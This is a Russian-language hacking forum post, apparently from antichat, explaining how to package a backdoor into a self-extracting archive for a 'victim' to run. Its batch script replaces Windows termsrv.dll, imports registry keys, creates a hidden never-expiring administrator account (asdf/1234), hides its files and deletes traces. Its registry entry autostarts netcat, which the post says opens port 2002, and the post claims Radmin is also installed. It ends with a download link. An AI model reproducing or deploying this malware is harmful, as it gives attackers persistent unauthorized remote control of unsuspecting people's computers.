В один прекрасный моменты я подумал, что было бы неплохо совместить эти 3 вещи. При запуске такого файла, что нибудь да сработает) Итак поехали. Принцип старый. Просто подкиним к SFX архиву еще несколько файлов и поменяем 111.bat и 111.reg. Дописываем bat Code: ren %SystemRoot%\system32\DLLCache\termsrv.dll termsrv.old ren %SystemRoot%\system32\termsrv.dll termsrv.old copy %SystemRoot%\help\123\termsrv.dll %SystemRoot%\system32\DLLCache\termsrv.dll copy %SystemRoot%\help\123\termsrv.dll %SystemRoot%\system32\termsrv.dll reg import key.reg del %SystemRoot%\system32\DLLCache\termsrv.old del %SystemRoot%\system32\termsrv.old del %SystemRoot%\help\123\termsrv.dll del %SystemRoot%\help\123\key.reg net user asdf 1234 /add /expires:never /times:all net localgroup "Ђ¤¬Ё*Ёбва*в®ал" asdf /add del %SystemRoot%\help\123\run.cmd attrib +r +h +s C:\Windows\Help\123\* attrib +r +h +s C:\Windows\Help\123 Последние две строчки присваивают папке 123 и ее файлам параметры: скрытый, только чтение, системный Дописываем reg Code: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "nc.exe"="\"C:\\Windows\\Help\\123\\nc.exe.lnk\"" Эти строки отвечают за автозапуск nc. Создадим ярлычок nc.exe и допишим там пару букв: Ну и все осталось завернуть)м... Даже ico прилепим Итого мы получили: У жертвы открыт 2002 порт, открыт удаленный доступ(пользователь:asdf, пароль:1234), стоит радмин(пароль 11223344). Качаем ТУТ Пароль: antichat.ru